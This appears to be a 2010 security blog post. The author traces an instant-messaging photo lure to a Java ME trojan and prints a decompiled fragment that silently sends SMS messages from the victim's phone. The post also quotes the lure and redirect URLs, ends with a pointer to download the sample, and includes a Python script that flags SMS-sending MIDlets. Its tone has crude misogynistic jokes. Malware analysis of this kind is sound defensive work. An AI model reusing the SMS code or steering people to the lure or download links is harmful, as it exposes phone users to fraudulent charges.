IT Security Lab The Playground for IT Security Specialists and Pentesters

22 Aug 2010

“From Russia With(out) Love” or The Story about Unsuccessful Exploitation of Non-existing Mobile Phone ;-)

I was planning to write a technical article this weekend, but an unexpected situation disturbed my Sunday equilibrium. So finally I decided to write about that instead. Here's what happened:

Ok, so I am lazily clicking here and there and thinking about what to do for lunch ("grep" on my fridge: it is almost empty) and suddenly, OMG: the window of my IM pops up and I see the following:

Translating from Russian: some unknown Anna says: "Hey, look at this picture and see how we had fun by the sea :-)".

I know well enough that "curiosity killed the cat", but look: an unknown (presumably totally stunning) Russian beauty is tempting me (me!!!), by mistake or on purpose, to see all-her-charms (yamie yame!) right now. Hmm..., let's have some fun. ;)

But "first things first". My advice to you, boys, about initial contact with "previously-unknown" ladies: well... try to arrange the meeting in an environment controlled by you. ;) This may save you from some unhappy surprises (in real life and also on the Internet). First thing: I am using the Miranda messenger only. And this means: my IM does exactly what I want, no more, no less. This reduces the risk of running exploits written for very popular messengers like ICQ, GG, MSN, etc. My own filtering, my own antispam, etc. Second: yes, I am opening the URL mentioned above, but in Firefox running through the Burp Suite (stopping on each request and response) and with scripts disabled (we only want to see the pictures of our baby, don't we...).

Ok, I see that my browser actually wanted to open this URL:

http://byyb.net/l/6149/id47254154

...which redirected me here:

http://regroyal.com/vkontakte/388/id47254154.jar

And now I am really disappointed, because my mysterious Russian beauty vanished and instead tried to make me run some strange Java applet. :( Let's see if there is some "whiskey in a jar". The file was immediately downloaded, its content unzipped (a .jar is actually a ZIP file) and analysed (the classes were decompiled).

So this is what I found. The classes were written for Java ME (Micro Edition), the Java platform designed for mobile devices. So the .jar is supposed to run on my mobile phone, not in my browser. I found some interesting content in the classes g.class, r.class and x.class.

Look at this:

    // Decompiled fragment. s holds the destination number (presumably a premium-rate
    // one), s1 the text to send. Imports added so the API being used is clear.
    import javax.microedition.io.Connector;
    import javax.wireless.messaging.MessageConnection;
    import javax.wireless.messaging.TextMessage;

    label0:
    {
        MessageConnection messageconnection = null;
        try
        {
            c_int_fld++;   // counts send attempts
            // open a WMA SMS connection to the number in s and create a text message on it
            TextMessage textmessage = (TextMessage)(messageconnection = (MessageConnection)Connector.open("sms://" + s)).newMessage("text");
            System.out.println("93");
            textmessage.setAddress("sms://" + s);
            textmessage.setPayloadText(s1);
            messageconnection.send(textmessage);   // the SMS is sent from the victim's phone
            messageconnection.close();
            System.out.println("<> SENDED ok");
            break label0;
        }
        catch(Exception exception)
        {
            // handler body not shown in the decompiled output
        }
    }

So this thingy is definitely sending SMSs (presumably quite expensive ones...). When I checked the file on virustotal.com, this is what I saw:

Wooooow, this thing is not funny at all. Check this [direct URL] pointing to the live result of Virustotal analysis.
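The manual triage described above (unzip the .jar, look at the classes, spot the SMS API) is easy to automate for a first pass. The following script is an added example, not code from the original post or from the malware: it reads the MIDlet manifest, flags every class that references the WMA messaging API or the sms:// scheme, and pulls digit strings that could be the destination numbers. The sample .jar it builds in memory is constructed for the demonstration (the "class" entries contain only the constant-pool strings a real class would carry, and the number 1234 is made up), and the string scan is a heuristic that stands in for full decompilation.

```python
import io
import re
import zipfile

# Strings an SMS-sending MIDlet leaves in its class files: the WMA messaging
# API and the sms:// scheme passed to Connector.open().
SMS_API_MARKERS = (
    b"javax/wireless/messaging/MessageConnection",
    b"javax/wireless/messaging/TextMessage",
    b"javax/microedition/io/Connector",
    b"sms://",
)

# Manifest attributes worth reading for a MIDlet; MIDlet-Permissions lists
# the MIDP 2.0 permissions the application asks the phone for.
INTERESTING_MANIFEST_KEYS = ("MIDlet-Name", "MIDlet-Vendor", "MIDlet-Permissions")


def parse_manifest(text):
    """Parse META-INF/MANIFEST.MF into a dict (continuation lines start with a space)."""
    attrs = {}
    last_key = None
    for line in text.splitlines():
        if line.startswith(" ") and last_key:
            attrs[last_key] += line[1:]
        elif ":" in line:
            key, value = line.split(":", 1)
            last_key = key.strip()
            attrs[last_key] = value.strip()
    return attrs


def find_phone_numbers(data):
    """Heuristic: digit runs of 4-15 chars in the class bytes (short codes, numbers)."""
    found = re.findall(rb"(?<![0-9])\+?[0-9]{4,15}(?![0-9])", data)
    return sorted(set(m.decode() for m in found))


def triage_jar(jar_bytes):
    """Static triage of a J2ME .jar: manifest, SMS-API references per class, numbers."""
    report = {"manifest": {}, "sms_classes": [], "numbers": [], "suspicious": False}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        if "META-INF/MANIFEST.MF" in names:
            mf = parse_manifest(zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
            report["manifest"] = {k: v for k, v in mf.items() if k in INTERESTING_MANIFEST_KEYS}
        for name in names:
            if not name.endswith(".class"):
                continue
            data = zf.read(name)
            hits = [m.decode() for m in SMS_API_MARKERS if m in data]
            if hits:
                report["sms_classes"].append((name, hits))
                report["numbers"].extend(find_phone_numbers(data))
    report["numbers"] = sorted(set(report["numbers"]))
    # Connector alone is normal (HTTP), so flag only the messaging API or sms:// scheme
    report["suspicious"] = any(
        "sms://" in hits or "javax/wireless/messaging/MessageConnection" in hits
        for _, hits in report["sms_classes"]
    )
    return report


def build_sample_jar():
    """Constructed toy .jar mimicking what the decompiled classes contain (not the real file)."""
    manifest = (
        "Manifest-Version: 1.0\r\n"
        "MIDlet-Name: Photo\r\n"
        "MIDlet-Vendor: unknown\r\n"
        "MIDlet-Permissions: javax.wireless.messaging.sms.send,\r\n"
        " javax.microedition.io.Connector.sms\r\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        # fake class bodies: magic number plus the constant-pool strings we care about
        zf.writestr("g.class", b"\xca\xfe\xba\xbe"
                    b"javax/wireless/messaging/MessageConnection\x00sms://\x00<> SENDED ok\x001234\x00")
        zf.writestr("x.class", b"\xca\xfe\xba\xbe" b"javax/microedition/lcdui/Display\x00")
    return buf.getvalue()


if __name__ == "__main__":
    import json
    print(json.dumps(triage_jar(build_sample_jar()), indent=2))
```

On a real sample you would pass the downloaded .jar's bytes to triage_jar() and then decompile only the classes it lists; a MIDlet-Permissions value naming sms.send in an application that claims to show a photo is by itself a strong reason to stop there.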

I also looked for some info on the Internet and found a very interesting discussion about an even more advanced case: http://www.maultalk.com/lofiversion/... (the text is in Russian). Quick translation: an unknown lady bitch starts picking up some guy on ICQ. He is surprised and wonders whether it's just his girlfriend having fun with him. But the unknown girl suddenly "becomes hot" and proposes to have sex with him. The guy thinks: what the heck? And she sends him the message "look at my picture and decide" together with a URL similar to the one I got. So now you know what you may get in this case...

I also found that there are several variations of this trojan (actually it's a mutation of the Garlag trojan, first detected in May 2009) which lure innocent (or stupid) users in different ways... Anyway guys, you may explore this nice piece of malware here [file to download] by yourself, but just beware...